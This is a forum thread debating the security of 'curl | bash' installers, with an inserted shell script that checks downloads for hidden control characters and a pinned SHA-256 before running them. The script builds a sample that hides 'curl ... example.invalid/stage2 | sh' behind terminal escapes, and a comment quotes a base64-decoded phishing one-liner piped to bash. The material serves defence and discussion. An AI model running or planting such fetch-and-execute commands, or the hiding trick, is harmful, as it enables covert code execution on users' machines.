jjgreen 2 days ago

Splendid idea, especially since "curl | bash" can be detected on the server [1] (which, if compromised, could serve hostile content only to those who do it).

[1] https://web.archive.org/web/20250622061208/http://idontplayd...

IshKebab 2 days ago | parent | next [-]

This is one of those theoretical issues that has absolutely no practical implications.

dgl a day ago | parent [-]

Here's an example of a phish actually using it: https://abyssdomain.expert/@filippo/114868224898553428 (also note `cat` is potentially another antipattern; `less -U` or `cat -v` is what you want).

IshKebab 19 hours ago | parent [-]

Sure, so how many people do you think saw `echo "Y3Vy[...]ggJg==" | base64 -d | bash` and thought "hmm, that's suspicious, I'd better check what it is doing... Ah, it's curling another bash script. I'd better see what that script is. Downloads script. Ah, I see, a totally legit script. All is well, I'll run the command!"

It's zero. Zero people. Nobody is competent enough to download and review a bash script and also not recognise this obvious scam.

They probably threw the pipe detection in just because they could (and because it's talked about so frequently).

falcor84 2 days ago | parent | prev | next [-]

Yes, ... but if the server is compromised, they could also just inject malware directly into the binary that it's installing, right? As I see it, at the end of the day you're only safe if you're directly downloading a package whose hash you can confirm via a separate trusted source. Anything else puts you at the mercy of the server you're downloading from.
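The two defensive points raised in this thread (dgl's `cat -v` / `less -U` suggestion, and the "only safe if you can confirm the hash via a separate trusted source" position above) fit together in a small pre-flight check for a downloaded installer. The script below is an added example, not code from the thread or from any project discussed; the function names, the `example.invalid` URL and the sample installer are all constructed for illustration. It refuses to run a file that contains control characters a plain `cat` would hide, and refuses to run a file whose SHA-256 does not match a digest you supply from an out-of-band source.

```shell
#!/bin/sh
# Added example (not from the thread): inspect a downloaded installer before
# running it, instead of piping it straight into bash.
#   has_control_chars  - flag bytes that `cat` renders invisibly (use `cat -v`)
#   verify_sha256      - compare the file against a digest obtained out of band
#   run_if_trusted     - execute only when both checks pass
set -eu

# Portable SHA-256 (GNU coreutils sha256sum or BSD/macOS shasum).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# True (exit 0) if `cat -v` would rewrite anything in the file, i.e. it holds
# control characters other than tab/newline, or non-ASCII bytes.
has_control_chars() {
    [ "$(cat -v "$1")" != "$(cat "$1")" ]
}

# True (exit 0) if the file's SHA-256 equals the expected hex digest in $2.
verify_sha256() {
    [ "$(sha256_of "$1")" = "$2" ]
}

# Run the script only when it is free of hidden bytes and matches the pinned
# digest; print the reason on refusal and return non-zero.
run_if_trusted() {
    file=$1; expected=$2
    if has_control_chars "$file"; then
        echo "refusing: $file contains hidden control characters (see: cat -v $file)" >&2
        return 1
    fi
    if ! verify_sha256 "$file" "$expected"; then
        echo "refusing: SHA-256 of $file does not match the trusted digest" >&2
        return 1
    fi
    sh "$file"
}

# Constructed sample (not a working payload): when printed with plain `cat` on
# a terminal, the carriage return plus ESC[2K (erase line) make the visible
# line read only: echo "installing..."
make_hidden_command_sample() {
    printf '#!/bin/sh\ncurl -s https://example.invalid/stage2 | sh\r\033[2Kecho "installing..."\n' > "$1"
}

# Offline demo: the constructed sample is refused, a clean script is run.
demo() {
    dir=$(mktemp -d)
    make_hidden_command_sample "$dir/installer.sh"
    run_if_trusted "$dir/installer.sh" "$(sha256_of "$dir/installer.sh")" || true
    printf '#!/bin/sh\necho "hello from a verified script"\n' > "$dir/clean.sh"
    run_if_trusted "$dir/clean.sh" "$(sha256_of "$dir/clean.sh")"
    rm -rf "$dir"
}
demo
```

In real use the second argument to `run_if_trusted` is the digest published on a channel independent of the download server (a release page over a different origin, a signed checksum file, a vendor's documentation); computing it from the downloaded file itself, as the demo does for want of a network, proves nothing. The control-character check is deliberately strict: a legitimate script containing UTF-8 text will also trip it, which is the right default for something you are about to execute.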

sim7c00 2 days ago | parent [-]

depending on what you run, one method might have more success than another. protections for malicious scripts vs. modified binaries are often different tools, or different components of the same tool, that can have varying degrees of success.

you could also use the script to fingerprint and beacon to check if the target is worth it and what you might want to inject into said binary if that's your pick.

still, i think i agree: if you're gonna trust a binary from that server or a script, it's potato, potato...

check what you run before you run it with whatever tools or skills you've got and hope for the best.

if you go deepest into this rabbit hole, you can't trust your hard disk or network card etc., so at some point it's just impossible to do anything. microcode patches, malicious firmwares, whatever.

for pragmatic reasons a line needs to be drawn. if you're paranoid, good luck, and don't learn too much about cybersecurity, or you will need to build your own computer :p
